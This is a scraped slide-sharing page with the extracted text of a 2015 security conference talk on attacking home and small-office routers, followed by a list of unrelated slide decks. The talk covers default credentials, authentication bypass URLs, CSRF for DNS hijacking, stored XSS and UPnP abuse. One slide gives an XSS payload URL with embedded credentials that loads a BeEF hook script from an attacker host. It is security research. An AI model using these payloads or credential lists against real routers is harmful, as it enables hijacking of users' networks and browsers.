revisiting soho router
play

Revisiting SOHO Router Attacks DeepSec 2015 About us.. ... Meet - PowerPoint PPT Presentation

Mar 22, 2023 •309 likes •1.03k views

Revisiting SOHO Router Attacks DeepSec 2015 About us.. ... Meet our research group lvaro Folgado Rueda Independent Researcher Jos Antonio Rodrguez Garca Independent Researcher Ivn Sanz de Castro Security Analyst at Wise Security

  1. Revisiting SOHO Router Attacks DeepSec 2015

  2. About us.. ... Meet our research group Álvaro Folgado Rueda Independent Researcher José Antonio Rodríguez García Independent Researcher Iván Sanz de Castro Security Analyst at Wise Security Global . Revisiting SOHO Router Attacks · DeepSec 2015 2

  3. Main goals Search for Explore innovative vulnerability issues attack vectors Evaluate the current security level of routers Develop exploiting Build an audit tools methodology Revisiting SOHO Router Attacks · DeepSec 2015 3

  4. State of the art • Previous researches Revisiting SOHO Router Attacks · DeepSec 2015 4

  5. State of the art • Previous researches Revisiting SOHO Router Attacks · DeepSec 2015 4

  6. State of the art • Previous researches Revisiting SOHO Router Attacks · DeepSec 2015 4

  7. State of the art • Previous researches Revisiting SOHO Router Attacks · DeepSec 2015 4

  8. State of the art • Previous researches Revisiting SOHO Router Attacks · DeepSec 2015 4

  9. State of the art • Previous researches Revisiting SOHO Router Attacks · DeepSec 2015 4

  10. State of the art • Real world attacks Revisiting SOHO Router Attacks · DeepSec 2015 5

  11. Common security problems • Services • Too many. Mostly useless. • Increases attack surfaces • Insecure Revisiting SOHO Router Attacks · DeepSec 2015 6

  12. Common security problems • Default credentials • Public and well-known for each model • Non randomly generated • Hardly ever modified by users Use ser / / Pas assword 18% 1234 / 1234 5% admin / admin 45% 5% [blank] / admin admin / password 27% vodafone / vodafone Revisiting SOHO Router Attacks · DeepSec 2015 7

  13. Common security problems • Multiple user accounts • Also with public default credentials • Mostly useless for users • Almost always hidden for end-users • Passwords for these accounts are never changed Revisiting SOHO Router Attacks · DeepSec 2015 8

  14. Common security problems • Multiple user accounts • Also with public default credentials • Mostly useless for users • Almost always hidden for end-users • Passwords for these accounts are never changed Revisiting SOHO Router Attacks · DeepSec 2015 8

  15. Bypass Authentication • Allows unauthenticated attackers to carry out router configuration changes • Locally and remotely • Exploits: • Improper file permissions • Service misconfiguration Revisiting SOHO Router Attacks · DeepSec 2015 9

  16. Bypass Authentication • Web configuration interface • Permanent Denial of Service • By accessing /rebootinfo.cgi • Reset to default configuration settings • By accessing /restoreinfo.cgi • Router replies with either HTTP 400 (Bad Request) or HTTP 401 (Unauthorized) • But spamming gets the job done! Vid ideo Demo #1 • Persistent Denial of Service without requiring authentication Revisiting SOHO Router Attacks · DeepSec 2015 10

  17. Bypass Authentication • SMB • Allows unauthenticated attackers to download the entire router filesystem • Including critical files such as /etc/passwd • File modification is as well possible • Erroneous configuration of the wide links feature Revisiting SOHO Router Attacks · DeepSec 2015 11

  18. Bypass Authentication • SMB • Allows unauthenticated attackers to download the entire router filesystem • Including critical files such as /etc/passwd • File modification is as well possible • Erroneous configuration of the wide links feature Revisiting SOHO Router Attacks · DeepSec 2015 11

  19. Bypass Authentication • Twonky Media Server • Allows unauthenticated attackers to manipulate the contents of the USB storage device hooked up to the router • Download / Modify / Delete / Upload files. • Misconfiguration of the service Revisiting SOHO Router Attacks · DeepSec 2015 12

  20. Bypass Authentication • Twonky Media Server • Allows unauthenticated attackers to manipulate the contents of the USB storage device hooked up to the router • Download / Modify / Delete / Upload files. • Misconfiguration of the service Revisiting SOHO Router Attacks · DeepSec 2015 12

  21. Cross Site Request Forgery ry • Change any router configuration settings by sending a specific malicious link to the victim • Main goal • DNS Hijacking • Requires embedding login credentials in the malicious URL • Attack feasible if credentials have never been changed • Google Chrome does not pop-up warning message Revisiting SOHO Router Attacks · DeepSec 2015 13

  22. Cross Site Request Forgery ry • Change any router configuration settings by sending a specific malicious link to the victim • Main goal • DNS Hijacking • Requires embedding login credentials in the malicious URL • Attack feasible if credentials have never been changed • Google Chrome does not pop-up warning message Revisiting SOHO Router Attacks · DeepSec 2015 13

  23. Cross Site Request Forgery ry • Change any router configuration settings by sending a specific malicious link to the victim • Main goal • DNS Hijacking • Requires embedding login credentials in the malicious URL • Attack feasible if credentials have never been changed • Google Chrome does not pop-up warning message Revisiting SOHO Router Attacks · DeepSec 2015 13

  24. Cross Site Request Forgery ry • Suspicious link, isn't it? • URL Shortening Services • Create a malicious website Revisiting SOHO Router Attacks · DeepSec 2015 14

  25. Persistent Cross Site Scripting • Inject malicious script code within the web configuration interface • Goals • Session Hijacking • Browser Infection Revisiting SOHO Router Attacks · DeepSec 2015 15

  26. Persistent Cross Site Scripting • Browser Exploitation Framework is a great help • Input field character length limitation • BeEF hooks link to a more complex script file hosted by the attacker http://1234:1234@192.168.1.1/goform?param=<script src="http://NoIPDomain:3000/hook.js"></script> Revisiting SOHO Router Attacks · DeepSec 2015 16

  27. Unauthenticated Cross Site Scripting • Script code injection is performed locally without requiring any login process • Send a DHCP Request PDU containing the malicious script within the hostname parameter • The malicious script is injected within Connected Clients (DHCP Leases) table Revisiting SOHO Router Attacks · DeepSec 2015 17

  28. Unauthenticated Cross Site Scripting Revisiting SOHO Router Attacks · DeepSec 2015 18

  29. Unauthenticated Cross Site Scripting • Sometimes it is a little bit harder... Revisiting SOHO Router Attacks · DeepSec 2015 19

  30. Unauthenticated Cross Site Scripting • Sometimes it is a little bit harder... Revisiting SOHO Router Attacks · DeepSec 2015 19

  31. Unauthenticated Cross Site Scripting • Or even next level... • But it works! Revisiting SOHO Router Attacks · DeepSec 2015 20

  32. Privilege Escalation • User without administrator rights is able to escalate privileges and become an administrator • Shows why multiple user accounts are unsafe Vid ideo Demo #2 • Privilege Escalation via FTP Revisiting SOHO Router Attacks · DeepSec 2015 21

  33. Backdoor • Hidden administrator accounts • Completely invisible to end users • But allows attackers to change any configuration setting Revisiting SOHO Router Attacks · DeepSec 2015 22

  34. Backdoor • Hidden administrator accounts • Completely invisible to end users • But allows attackers to change any configuration setting Revisiting SOHO Router Attacks · DeepSec 2015 22

  35. In Information Disclosure • Obtain critical information without requiring any login process • WLAN password • Detailed list of currently connected clients • Hints about router's administrative password • Other critical configuration settings Revisiting SOHO Router Attacks · DeepSec 2015 23

  36. In Information Disclosure • Obtain critical information without requiring any login process • WLAN password • Detailed list of currently connected clients • Hints about router's administrative password • Other critical configuration settings Revisiting SOHO Router Attacks · DeepSec 2015 23

  37. Information Disclosure In Revisiting SOHO Router Attacks · DeepSec 2015 24

  38. Information Disclosure In Revisiting SOHO Router Attacks · DeepSec 2015 24

  39. Information Disclosure In Revisiting SOHO Router Attacks · DeepSec 2015 24

  40. Universal Plug and Play • Enabled by default on several router models • Allows application to execute network configuration changes such as opening ports • Extremely insecure protocol • Lack of an authentication process • Awful implementations • Goals • Open critical ports for remote WAN hosts • Persistent Denial of Service • Carry out other configuration changes Revisiting SOHO Router Attacks · DeepSec 2015 25

  41. Universal Plug and Play • Locally • Miranda UPnP tool Revisiting SOHO Router Attacks · DeepSec 2015 26

  42. Universal Plug and Play Revisiting SOHO Router Attacks · DeepSec 2015 27

  43. Universal Plug and Play Revisiting SOHO Router Attacks · DeepSec 2015 27

  44. Universal Plug and Play • Remotely • Malicious SWF file Revisiting SOHO Router Attacks · DeepSec 2015 28

Recommend

Advanced SOHO Router Exploitation Lyon Yang / @l0Op3r

Advanced SOHO Router Exploitation Lyon Yang / @l0Op3r

Advanced SOHO Router Exploitation Lyon Yang / @l0Op3r www.vantagepoint.sg | office@vantagepoint.sg Hi everyone my name is Lyon Yang I hack IoT and embedded systems. I live in sunny Singapore. Spoke @

846 views • 47 slides
SOHO SOHO SOHO SOHO HIGH RISE HIGH RISE HIGH RISE HIGH RISE CONDOMINIUMS CONDOMINIUMS

SOHO SOHO SOHO SOHO HIGH RISE HIGH RISE HIGH RISE HIGH RISE CONDOMINIUMS CONDOMINIUMS

SOHO SOHO SOHO SOHO HIGH RISE HIGH RISE HIGH RISE HIGH RISE CONDOMINIUMS CONDOMINIUMS CONDOMINIUMS CONDOMINIUMS A STUDY OF LIGHTWEIGHT A STUDY OF LIGHTWEIGH T CONCRET CONCRETE CO CONSTRUCTION NSTRUCTION JOSEPH MUGFORD

687 views • 34 slides
KING WEST SOHO. New York City SOHO of Toronto The mix of new modern urban buildings within the

KING WEST SOHO. New York City SOHO of Toronto The mix of new modern urban buildings within the

KING WEST SOHO. New York City SOHO of Toronto The mix of new modern urban buildings within the existing Victorian style architecture surroundings offers a charming and trendy atmosphere that is unique and beloved by many. King West has been

326 views • 3 slides
Investor Announcement Acquisition of Soho Gyms July 2018 Overview: PureGym acquires Soho Gyms

Investor Announcement Acquisition of Soho Gyms July 2018 Overview: PureGym acquires Soho Gyms

Investor Announcement Acquisition of Soho Gyms July 2018 Overview: PureGym acquires Soho Gyms Tr Transaction Overview Pr Pro F Forma Ca Capitalisation PureGym completed the acquisition of Soho Gyms on 22 Capital Capi alisat ation

292 views • 4 slides
CNC Router What is it good for? About the CNC Full name is CNC Router but is shortened to CNC

CNC Router What is it good for? About the CNC Full name is CNC Router but is shortened to CNC

CNC Router What is it good for? About the CNC Full name is CNC Router but is shortened to CNC CNC stands for Computer Numeric Controlled (Router) Very Expensive Can only be used with proper training Trumans favorite

534 views • 7 slides
Bizfon 680 System SOHO Analog Phone System Easy to use, Self Install SOHO Solution Bizfon 680

Bizfon 680 System SOHO Analog Phone System Easy to use, Self Install SOHO Solution Bizfon 680

Bizfon 680 System SOHO Analog Phone System Easy to use, Self Install SOHO Solution Bizfon 680 Market Opportunity SOHO (Small Office / Home Office) Market Opportunity 12,717 businesses have &gt;500 employees 556,988 businesses have 20

120 views • 11 slides
Off- -Line Router ETR Line Router ETR- -400 400 Off 2007. 05. 15 Rev. 1 2007. 05. 15

Off- -Line Router ETR Line Router ETR- -400 400 Off 2007. 05. 15 Rev. 1 2007. 05. 15

Off- -Line Router ETR Line Router ETR- -400 400 Off 2007. 05. 15 Rev. 1 2007. 05. 15 Rev. 1 http://www.eunil.com PCB Router / Depanel machine : Off-Line ETR-400 This machine is used to separate the main panel PCB and the arrayed

131 views • 9 slides
BSD Router Project Don't buy a router: download it ! FOSDEM 15 Olivier Cochard-Labb

BSD Router Project Don't buy a router: download it ! FOSDEM 15 Olivier Cochard-Labb

BSD Router Project Don't buy a router: download it ! FOSDEM 15 Olivier Cochard-Labb olivier@cochard.me Agenda Why a x86 software router ? Project Targets NanoBSD: FreeBSD for appliance BSDRP feature list

561 views • 32 slides
Six/One Router Six/One Router A Scalable and Backwards-Compatible Solution for

Six/One Router Six/One Router A Scalable and Backwards-Compatible Solution for

Six/One Router Six/One Router A Scalable and Backwards-Compatible Solution for Provider-Independent Addressing 300 K number of number of r routing ta outing table entries ble entries 250 K 200 K 150 K 100 K Geoff Huston: CIDR Report 50 K

171 views • 15 slides
Security AutoSecure Router HardeningAutomagically The process of turning off unnecessary

Security AutoSecure Router HardeningAutomagically The process of turning off unnecessary

Security AutoSecure Router HardeningAutomagically The process of turning off unnecessary services is called hardening a router to prevent attacks or exploits. The basic steps of router hardening are: 1) Administratively shut down

102 views • 8 slides
200 Lafayette Street - Existing Conditions May 2017 Landmarks Preservation Commission Sheet 1

200 Lafayette Street - Existing Conditions May 2017 Landmarks Preservation Commission Sheet 1

SoHo-Cast Iron Historic District Extension N o H o H i s t o r i c SoHo-Cast Iron D i s t r i c t Historic District Extension 9 2 M a c D o u g a l - S u l l i v a n 2 1 8 Borough of Manhattan, NY W H

339 views • 12 slides
An Enhanced Global Router An Enhanced Global Router An Enhanced Global Router An Enhanced Global

An Enhanced Global Router An Enhanced Global Router An Enhanced Global Router An Enhanced Global

An Enhanced Global Router An Enhanced Global Router An Enhanced Global Router An Enhanced Global Router With Consideration of With Consideration of General Layer Directives General Layer Directives Hsien Lee 1 , Yen Jung Chang 1 , and Ting

365 views • 33 slides
OSPF Router Types OSPF Router Types There are four types of OSPF routers. Router types are

OSPF Router Types OSPF Router Types There are four types of OSPF routers. Router types are

OSPF Router Types OSPF Router Types There are four types of OSPF routers. Router types are determined by a routers function and/or location within an OSPF area: Internal (IR) all (OSPF?)* interfaces must belong to the same OSPF area.

241 views • 10 slides
Scaling Databases with DBIx::Router Perrin Harkins We Also Walk Dogs What is DBIx::Router?

Scaling Databases with DBIx::Router Perrin Harkins We Also Walk Dogs What is DBIx::Router?

Scaling Databases with DBIx::Router Perrin Harkins We Also Walk Dogs What is DBIx::Router? Load-balancing Failover Sharding Transparent (Mostly.) Why would you need this? Web and app servers are easy to scale Just add another dozen boxes

489 views • 33 slides
Regaining sovereignty over your router Lucas Lasota | Legal Team lucas.lasota@fsfe.org What is

Regaining sovereignty over your router Lucas Lasota | Legal Team lucas.lasota@fsfe.org What is

Regaining sovereignty over your router Lucas Lasota | Legal Team lucas.lasota@fsfe.org What is it all about? 1. Why Router Freedom is important? 2. Router Freedoms panorama in Europe 3. How to make a stand for Router Freedom 2 Why

254 views • 9 slides
Online Security Michael Hutchinson My First line of Defense Making Things Secure Router

Online Security Michael Hutchinson My First line of Defense Making Things Secure Router

Online Security Michael Hutchinson My First line of Defense Making Things Secure Router Security Anti-Malware Programs Browser Security Internet Searching Router Security Router is First Line of Defense Router typically

472 views • 23 slides
Current W ireless Router C Current W ireless Router C Traditional Routing requires 4 time

Current W ireless Router C Current W ireless Router C Traditional Routing requires 4 time

Analog Network Coding Sachin Katti Shyamnath Gollakota and Dina Katabi Current W ireless Router C Current W ireless Router C Traditional Routing requires 4 time slots Current W ireless Router C Traditional Routing requires 4 time slots

602 views • 31 slides
Configurable software- -based based Configurable software edge router architecture edge router

Configurable software- -based based Configurable software edge router architecture edge router

Configurable software- -based based Configurable software edge router architecture edge router architecture Wajdi LOUATI Badii JOUABER Djamal ZEGHLACHE Institut National des Tlcommunications 4 th Workshop on Applications and Services in

301 views • 17 slides
Signing a Linear Subspace: Signature Schemes for Network Coding David Mandell Freeman CWI &amp;

Signing a Linear Subspace: Signature Schemes for Network Coding David Mandell Freeman CWI &amp;

Signing a Linear Subspace: Signature Schemes for Network Coding David Mandell Freeman CWI &amp; Universiteit Leiden IPAM Retreat: Securing Cyberspace 9 June 2009 Network coding [ACLY00] recipient router router router sender router

330 views • 18 slides
BAETSCH IN THE CITY INTRO Competition: culburb (EU) and SOHO in Ottakring. This project was the

BAETSCH IN THE CITY INTRO Competition: culburb (EU) and SOHO in Ottakring. This project was the

BAETSCH IN THE CITY INTRO Competition: culburb (EU) and SOHO in Ottakring. This project was the result of Paul Woodruffe and Walter Klasz winning the design competition for an architectural acupuncture for Nietzchplatz as part of the Culburb

365 views • 11 slides
WANWide Area Network. The internet at large, the outside. LANLocal Area

WANWide Area Network. The internet at large, the outside. LANLocal Area

Typical Network Topology SOHO Firewalls WAN 2006-11-25 (Internet) What is it: Networks and Firewalls / Routers firewall/ DMZ router Typical Network Topology LAN LAN LAN WANWide Area Network. The internet at large, the

624 views • 6 slides
Containers: Exploits, Surprises, And Security with Elissa Shevinsky COO at SoHo Token Labs

Containers: Exploits, Surprises, And Security with Elissa Shevinsky COO at SoHo Token Labs

Containers: Exploits, Surprises, And Security with Elissa Shevinsky COO at SoHo Token Labs Editor of Lean Out #RVASec @ElissaBeth on twitter @Elissa_is_offmessage on Instagram this was Silicon Valley in 2011 Containers are eating

954 views • 66 slides
PUX Router Pro 10/17/13 | 2.009 Fall 2013 PUX | Key Challenges Customer Need Product Attribute

PUX Router Pro 10/17/13 | 2.009 Fall 2013 PUX | Key Challenges Customer Need Product Attribute

PUX Router Pro 10/17/13 | 2.009 Fall 2013 PUX | Key Challenges Customer Need Product Attribute make high quality cuts precision of measurement easily positioned by hand small cutting forces easily transportable carried in standard router case

192 views • 18 slides
Revisiting Paulsons Theory of the Con- structible Universe with Isar and Sledge-

Revisiting Paulsons Theory of the Con- structible Universe with Isar and Sledge-

Revisiting Paulsons Theory of the Con- structible Universe with Isar and Sledge- hammer Ioanna M. Dimitriou H. and Peter Koepke, University of Bonn, Germany AITP 2016 Obergurgl, Austria, April 3-7, 2016 Revisiting Paulsons

703 views • 33 slides

More recommend